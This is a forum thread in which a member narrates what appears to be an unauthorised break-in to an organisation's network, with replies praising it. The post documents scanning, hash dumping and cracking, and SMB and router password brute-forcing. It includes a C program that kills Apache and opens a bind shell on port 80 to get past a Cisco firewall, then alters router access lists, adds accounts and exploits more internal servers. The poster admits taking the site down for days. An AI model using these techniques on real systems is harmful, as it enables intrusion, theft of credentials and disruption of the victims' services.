View Full Version : Bypassing a Cisco IOS firewall

12-11-2010, 03:19 AM
This documentation is about a successful attack Strategy on something which I was trying out form last 15 days. It all started with silent-poison handing over to me a webshell, "a non interactive .php shell" on a webserver the shell was having NT-Authority System privileges. He did a good work there, as I was told he used a joomal exploit to get that shell up running. And it was obviously a high priority webserver .He should probably document that part :).

The issue he was facing was that he was not able to back connect nor use bind shell to get an interactive command prompt. Well yes it would be definitely be because of a proxy/Firewall/Nating issues.

Day 1:

All I am having is a web shell with privileges to execute commands, it was a windows 2008 serevr . I started by doing an external nmap

fb1h2s@bktrack:~#nmap -T4 -A targetip

"which will generate a full scan including tracert and script scans"

Out put was:

TCp Port : 80 Open

No filtered ports but just an open port,as normally if firewalled windows RPC ports would be filtered .Himm should be a Router ACL configured with no outbound connections and Only allow inbound connection on port 80

For confirming I uploaded a command line port-scanner, not nmap as I am not having interactive command prompt and configuring namp+wincap on non interactive setup is hard so dint wanted to take that pain.

I uploded Found ScanLine v1.01 http://www.foundstone.com/us/resources/proddesc/scanline.htm and did banner garbing on the device which is doing the Nating

ipconfig > found the device ip

sl -vbt

Starting scan against port range: 1-5000
Total number of maximum threads is 20. Socket timeout is set to 20ms.
Port 1720 is open.
-- End of open TCP ports list.

Cisco IOS firewall
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No
TCP ports: 23 80 1720

Before starting I dumped the admin/user hashes using http://www.foofus.net/~fizzgig/fgdump/fgdump-usage.htm and cracked online using https://www.objectif-securite.ch/en/products.php
Which by the way was Admin@internal-ip-last-octet seems like I might have more chance for similar passwords :D

So problem maker is a cisco Ios firewall . So I have to bypass this one to get an interactive shell Rdp,commd prompt etc. And the question is how ??

Day 2

It took two days to build an option set

[+]Few solutions I could think about was
[1]Get access to firewall by Brute-forcing password or some other means modify the acess list to.

access-list 101 permit tcp any host eq 3389
[Hard?impossible form a non interactive shell ] And bruteforce program and all I ill have to code in native C/C++ which I wasn't that fast in doing [I am in love with python :)]

[2] Find another system in the network which might have internet acess like Mail serevr Dns servers hack them then tunnel firewalled machines traffic and take it out to the internet and get interactive shell.

[3] DNS tunneling and Port reuse http://www.blackhat.com/presentations/bh-usa-08/Miller/BH_US_08_Ty_Miller_Reverse_DNS_Tunneling_Shellcode .pdf Metsploit got DNs tunneling payloads. "You cant achieve fully interactive shell"

And from these I choose the second option. So now I have to spot system with which might have direct internet access.

ipconfig /all Give me my Internal Dns server IP.
I also did a Portscan on my subnet which gave me the Dns names too
" Dns names changed"
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No


Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No

Hostname: ipcam-client
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No
Starting scan against port range: 1-5000
Total number of maximum threads is 50. Socket timeout is set to 3ms.
Port 22 is open.
Port 80 is open.
Port 443 is open.
Port 554 is open.
Port 2112 is open.
Port 3306 is open.
Port 4112 is open.
Port 4116 is open.
Port 4343 is open.
-- End of open TCP ports list.

Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No


Scan finished at Thu Nov 25 15:34:20 2010

Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: No
TCP ports: 22 80 443 554 2112 3306 4112 4116 4343

Hostname: exch.my.target.com
Responds with ICMP unreachable: No
Responded in 0 ms.
1 hop away
Responds with ICMP unreachable: No
TCP ports: 21 25 53 80 88 110 135 139 143 389 443 445 464 593 636 993 995 1025 1027 1038 1054 1058 1060 1066 1069 1107 1111 1123 1129 1163 1201 1219 1801 2101 2103 2105 2107 3171 3172 3173 3268 3269 3389

12-11-2010, 03:22 AM
Seems like I spotted what I wanted an Exchange mail server of target with Dns name exch.my.target.com
And another good news is there is quite a huge no of servers inside the network,
Including a Survilance Camera System and a I TB data server using "MYBOOKWORLD"
Hostname: ipcam-client "Lets come back to this later"

So now I knew the DNS name of there mail server ,
till date I haven't seen an organization using 2 different Dns names for mail servers Internal and external so high possibility that we would be able to get the External IP address form this DNS name.

I typed on my browser the mail Domain name exch.mytarget.com and yuhu targets Microsoft Exchange webmail login poped opned :D. So now I have my target . Time to see if its fire-walled or not.

Nmap -T4 -A IP

12-11-2010, 03:23 AM

Fiar enough so now this is would be the target to hack. A quick looking up also revealed that target mail server was also there Domain controller :D how stupid is that. And what the point in putting a firewall in front off web server and not doing anything to this Mail/Domain server, Sad but good for me.

Nmaps Smb bruter module gives good results. So that if I could crack an account then I could use it to excute commands using Pstools

psexec -u user -p password \\marklap command

So did an nmap smbruter and Good news was got two successful logins

nmap --script smb-brute.nse -p445


And bad news was that none of the users were privileged enough to get command execution :(.

I did little more pocking around with the mail server found out the snmb community string was public only used Snmpenum, listed updates and checked if any was missiing, that too dint worked.

12-11-2010, 03:24 AM
Trying to compromise it dint succeed. And got exhausted. See my motive is to attain Interactive shell on that webserver. So I din't spend more time with the mail server and started thinking about a different one.

[+] Plan 1,2,3 flopped for me so need to make a new plan
[-] Curent scenario is the Nating is taking place in the Cisco firewall where connections are forwarded to internal Ip and Cisco ACL is configured in such a way that.

access-list 101 permit tcp any host eq 80
--> allows connection on port 80
access-list 101 deny tcp any host eq any
--> deny any other connections on any other port

You could read a good doc abt ACLs here http://www.cisco.com/en/US/tech/tk648/tk361/technologies_configuration_example09186a0080100548 .shtml

[-]So connections to port 80 would be accepted and forwarded to internal computer. As the Webserevr running Apache is using port 80 we cant bind a port on the 'inused' port .

Some were I have read a used port reuse methodology ,
dint get it though

12-11-2010, 03:24 AM

Stupid Most Idea

We cant use port 80 as its been used by apache but if we could shut down apache and make a Command bind shell on port 80 then we could simply telnet to the server and get an interactive command prompt, firewall wont even say a word :cool:.

Well my idea was dump but if that would satisfy my needs then that would be all enough.

Setting up the plan
1) Make a bind shell using metsploit bind to internal machines Ip on port 80
2) Make another program which will kill http and call our bind shell and loop through the process so that we wont loose control over web shell.
3) Make sure that my plan is working fine, by testing/verifying it on local machine. If anything goes wrong then we will end up with nothing.
4) And also excute the plan only at midnight when no traffice to that web server is there, verify that with netsta -a and do accordingly

[+] A small code to do stuff was built

///stupid code by fb1h2s
//well not leet but idea works :D
int main(int argc, char** argv)
int running =1;

while(1 ==1)

system("taskkill /IM httpd.exe /F"); // kill http
WinExec("bind.exe", SW_SHOWNORMAL); // call windows bind shell port 80
Sleep(250000); // lets hang out with intractive command prompt for 4 mins //and try to compromise firewall
system("taskkill /IM bind.exe /F"); // kill bind shell
WinExec("C:\\pathonwebserver\\apache\\bin\\httpd.exe", SW_SHOWNORMAL);
//bring back http server my work is done and let continue after some time


12-11-2010, 03:25 AM
Once code was built I tested on my local system, all these with the assumption that a CBAC Context based acesslist is in use http://www.cisco.com/en/US/docs/ios/11_3/feature/guide/firewall.html#wp8216 is created normally its CABC only.
and everything worked fine.

Uploaded Bind shell and uploaded winexec.exe binary and all in place. I executed


Boom Apache went down as planned so as the webshell , now I tried to telnet to port 80 of target , screwed noting works, not getting any Command prompt back, waited for 5 mins to get back my http server, that too dint work, Screwed royally :rolleyes:

Its only after that I understood my stupidity
1) winexec.exe is called form command line via php--> cmd.exe /winexec.exe
2)When winexec.exe excutes it kills appache there by php and ends calling terminal cmd.exe
3) so no calls to bind.exe is made :(
4) when I tested on my local machine I only tested it by running the codes manually dint call it form webshell.

I could have planned and taught a little more.All I needed to do was make another program "callwinexec.exe" which called winexec.exe and run "callwinexec.exe" from webshell
And not doing thats consequences was that the webserver was down for 5 days . And I waited anxiously checking every day whether the site was back up or not.

So back on 9th day server was up again.

Irresponsible admins why would they need 5 days to restart apache

12-11-2010, 03:25 AM
Now the time for real woot woot ,
Uploaded programs to server and triggered callwinexec.exe

Result was:

So command prompt is achieved, and a quick bruteforce on the routers telnet was done remember I have mentioned the admin password of the webserver was Admin@ip-adress-last-octect so same stuff worked on the router to. That was quick :D. And I modified acesslist enabled any to any on the router. I used the http://www.cisco.com/en/US/tech/tk648/tk361/technologies_configuration_example09186a0080100548 .shtml

And used google to do most of the stuffs.

So any to any acess is granted and rdp also was available.
I had issues with logging in, as the webadmin had left a rdp session unclosed so had to use this tutorial to get past it http://retrohack.com/killing-rdp-sessions-at-the-cmd-line/

And I did another stupid thing that was installing python for further exploitations. which was discovered by admin the next day and took down server for maintenance for one day and changed the admin password also he made the NT+LM hashes unavailable, but dint figure out the router thing.

So next day night I had to get a bind shell back and as I dint know the password and only NT hashes were available I had to use

net user user new password
net user /add


which still work on windows server 2008

to get a new user and used Remote Desktop to to connect to it. MY aim was already complected but my curiosity of seeing the rest of the servers in the network made me install Nessus and Nmap on tht serevr.

Nessue 4 will have issues with flash via rdp , as you need to install a stand alone version of flash for IE to acess flash via RDP

As I already had made the list of alive IPs using foundstone scan line on the very first days itself, segregated the Ips list and passed them to nessus and nmap.

16th Day that was yesterday
Owned 4 more servers inside using three different exploits.
I am not going in detail about those stuffs coz am tired writing + you could google about them. Or will detail abt Jboss exploit in some other article.
1) ms08-067 used a public version of the code
2) Jboss console was there on another win 2008 server 0wned that too.
https://issues.jboss.org/browse/ASPATCH-126?page=com.atlassian.jira.plugin.system.issuetab panels%3Achangehistory-tabpanelhttps://issues.jboss.org/browse/ASPATCH-126?page=com.atlassian.jira.plugin.system.issuetab panels%3Achangehistory-tabpanel
3) Microsoft Windows SMB Shares Unprivileged Access
4)Password brute fore Admin@ip worked on another machine too.

I was hacking like a mad ass for the last 15 days. Though my primary target inside was a CISCO VOSM surveillance camera management server, I could not reach there. It was a linux machine and am not that good remotely exploiting linux.

And today I got a confirmation form Null Con folks confirming that my paper on "Penetration testing Biometric system " was selected so had to work on that and wont be able to continue with this one . So just taught of documenting the work so it will save some one Else's time in places where I lagged.

And am thanking all the good fellow hackers of Garage4hackers and others whom I bugged these days asking my doubts, who all helped me out in circumstances .
B0nd,Eberly,wipu,webd3vil,sagar.belure,vinnu and
greetz to garage members : silenpoison(special one for starting it), w4ri0r,empty,neo,Rohith,Sids786,d4rkest,SmartKD,Ti a,h@xor,Atul,prasant,micro,nishant.
And obviously to my sweet girl friend who calls me busy geek and knows that am not a good BF, but still loves me .

I always add this greetz part to wht ever I post :)

PDF Version Attached:

12-11-2010, 05:58 AM
Yeah fb. Couple of days back empty told me about your idea of stopping the web server and running own code as only web port was allowed through firewall. That part I found deadly!!!

You fall under the category of "determined hackers" and it is just next to impossible to stop such brains :)

12-11-2010, 10:47 AM
EPIC ..... this topic is bookmarked for reference ... One of the most epic post in garage

12-11-2010, 11:07 AM
Mind-blowing :)..really, fb1h2s is a "determined hacker" ;)

12-11-2010, 12:32 PM
Great Idea and Determination to Achive the Goal Thats what A True hacker is

12-11-2010, 01:08 PM
good one bro :)
Very well exploited and thanks documenting in such a gr8 way :D

12-11-2010, 02:03 PM
What ever he shares is always innovative and gives something new to learn..Hats off to you bro.. :)

12-11-2010, 09:35 PM
Awsome Stuff Fb1 i am proud to be having a "deadly hacker" friend like you...

12-11-2010, 11:06 PM
@bond just inspired form you all guys :)
@all I just tried and tried and did it :)

12-12-2010, 05:33 PM
@fb1h2s Kudos to you,one of the interesting articles i've ever read..keep the good work up :)

12-12-2010, 10:21 PM
You really did a great job. The post was very interesting. I liked that callwinexec.exe part most. Thanks for sharing such experiences.

12-13-2010, 09:43 AM
Keep on man, you have delivered marvelous aproach., You have written a wizard to hack into systems remotely..."vinnu"

12-13-2010, 06:41 PM
Awesome Work bro:) Keep it up, really very inspiring thats The Spirit of a True Hacker Kudos to you :D

12-13-2010, 06:56 PM
Amazing share..... bro you always rock....TFS :)

12-13-2010, 07:45 PM
bro i just love the way you document ....listing all the ideas and plans .. countering one with other .. this helps so much !! :)
Keep rocking !!

01-24-2011, 12:53 PM
There is a bit of confusion in your story....

when you say you have dumped the password hashes using fgdump and cracked it. My question to you is very simple. How did you dump the hashes with fgdump because, fgdump asks you the administrative priviledged account password for dumping the hashes.

So, if you already know the administrator password, why did you crack it?
how did fgdump work without providing the password???

01-24-2011, 04:13 PM
If you check the second line of my post I have mentioned
a webshell, "a non interactive .php shell" on a webserver the shell was having NT-Authority System privileges. NT-Authority System privileges is system account which hold more power than Admin accounts, if we could run codes in context of an installed admin service this is possible :) here php helped in attaining system acess.

Nice thought though.

01-25-2011, 09:17 PM
If you check the second line of my post I have mentioned NT-Authority System privileges is system account which hold more power than Admin accounts, if we could run codes in context of an installed admin service this is possible :) here php helped in attaining system acess.

Nice thought though.

Got you...! :)

01-27-2011, 11:28 PM
Like master like follower........ its just FB1 version of B0nd's - Boot to Remote Root. I am not comparing anything here... but what I all see is you both share the same passion when it comes to hacking...

awesome...... and i was one of those luckiest person who were there not to read but to listen this idea... watch this idea live....... I felt so enlightened and inspired that i can not explain in words.....i wont say awesome share . or keep it up or anything... all i have for these guys is a big FAT THANK YOU....

06-27-2011, 01:06 AM
Thanks for sharing dude its worth appreciating

06-19-2012, 10:28 AM
mate awesome post but this should be in private so only registered members can see it....it also solved my problems to.....thanx

06-19-2012, 10:28 AM
Are u working in a InfoSec company or you are doing all alone?

06-23-2012, 11:18 PM
This music is totally dedicated to fb1h2s

You Are Fucking Awesome!! - YouTube (http://www.youtube.com/watch?v=zkJSBv6Tj0E)

Can't write the feelings in the letters..:D so expressed it via Youtube..:|